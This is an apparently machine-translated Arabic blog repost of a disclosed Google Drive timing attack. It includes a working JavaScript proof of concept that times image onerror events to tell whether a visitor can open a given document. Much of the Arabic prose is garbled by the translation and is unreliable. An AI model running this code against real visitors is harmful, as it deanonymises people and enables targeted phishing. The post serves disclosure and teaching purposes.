Demasking جوجل المستخدمين مع هجوم التوقيت

التسميات:

رابط موضوع الماخوذ عن المصدر من هنا
وأعتقد اعتقادا قويا في الكشف مسؤولة من القضايا الأمنية، وقد شارك في برنامج الكشف مسؤول جوجل في الماضي والمساعدة في تشغيل برنامج مماثل في Mavenlink الكشف.
ناقش قضايا في هذا المنصب بمسؤولية تم الكشف عن أن أمن جوجل. triaged جوجل القضايا، والمشاركة تحدثت إلى فرق، وامتنع فرصة لإصلاح. أعطوني إذن كتابي لبلوق حول هذا الموضوع.
هجوم
ملخص: موقع 3rd الطرف يمكن أن يحدد ما إذا كان موقع المشاهد لديه حق الوصول إلى وثيقة جوجل محرك أقراص معين.
الآثار: يمكن للمهاجم مشاركة سجل مع واحد أو أكثر من عناوين البريد الإلكتروني، قم بإلغاء تحديد الهدف الخيار الذي يسبب جوجل لإرسال إعلام. مهاجمة الآن الموقع يمكن معرفة ذلك عند تسجيل شخص في أي من العناوين المشتركة يزور موقعهم. هذا هو مفيدة جدا في الغالب لهجمات المستهدفة، حيث يحتاج المهاجم العام الموقع على التصرف تعتمد بشكل مختلف على من هو المشاهدة. هذا يمكن أن يكون الزراعة للالتصيد الرمح، وتحديد المسؤولين الحكوميين، demasking مستخدمي الرقمي، والأذى الصناعي، الخ
كيف يعمل: وهذا الهجوم هو مباشرة. صفحة الخبيثة instantiates مرارا صورة نقطة لمن URL مصدر في وثيقة محرك جوجل. إذا كان هذا المستند للعرض من قبل الزائر، هل الناتجة وصفحة التحميل تأخذ على طول إذا كان من الوثيقة ليست للعرض. لأن النتيجة ليست صورة، يتم تشغيل صورة للرد onerror في كل هدف صناديق يمكننا تسجيل الزمن الذي يستغرقه مثيل من صورة لاثار من onerror. هذه المرة ستكون أكبر عندما يمكن الوصول إليها الوثيقة. في تجاربي، أحاط تحميل المتوسط ​​العام لل891ms عندما كان وثيقة المتاحة، الهدف 573ms عندما لم يكن. لأن هذا سوف يكون تعتمد على اتصال، فمن المنطقي لاختبار في وقت واحد ضد وثيقة ما هو معروف دائما أن تكون غير قابلة للتحقيق، مرة مقارنة مع التحقيق ثم توثيق.
جوجل لا شيء لإصلاح هذه المشكلة، إذ أن "خطر هنا هو منخفضة إلى حد ما، على حد سواء، من حيث التأثير وصعوبة هذه ضد استغلال عدد كبير من السكان، ونحن لا يكون بين العام حل فعال." أنا لا نختلف حقا مع them- هذا من الصعب إصلاح، والنظرية إلى حد ما. ومع ذلك، أعتقد أن هذا العام هو مثال مثير للاهتمام من هجوم التوقيت، ويظهر مدى صعوبة أطروحة من نوبات من يمكن أن يكون لتجنب
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32






33
34
35
36

var urls = {
  hasAccess: "https://docs.google.com/document/....../edit",
  doesNotHaveAccess: "https://docs.google.com/document/....../edit"
};

function addImage(src, callback) {
  var elem = document.createElement("IMG");
  elem.src = src + "?r=" + Math.random();
  elem.onerror = callback;
  $("body").append(elem);
}

var times = {
  hasAccess: { sum: 0, count: 0 },
  doesNotHaveAccess: { sum: 0, count: 0 }
};

var testRuns = 40; // a smaller number can be used

function nextTest() {
  testRuns--;
  if (testRuns > 0) {
    var type = Math.random() > 0.5 ? 'hasAccess' : 'doesNotHaveAccess';
    var startTime = new Date().getTime();
    addImage(urls[type], function() {
      var endTime = new Date().getTime();
      times[type].count++;
      times[type].sum = times[type].sum + (endTime - startTime);
      setTimeout(nextTest, 100); // a shorter timeout is fine
    });
  } else {
    $("body").append("hasAccess: " +
 (times.hasAccess.sum / times.hasAccess.count) + "<br />" + "doesNotHaveAccess: " 
+ (times.doesNotHaveAccess.sum / times.doesNotHaveAccess.count));
  
}
}

nextTest()



رابط موضوع الماخوذ عن المصدر من هنا


هل أعجبك الموضوع ؟
التعليقات
0 التعليقات

ليست هناك تعليقات:

إرسال تعليق

جميع الحقوق محفوظة ©2012-2013 | ، نقل بدون تصريح ممنوع . Privacy-Policy| أنضم ألى فريق التدوين

traget='_blank'>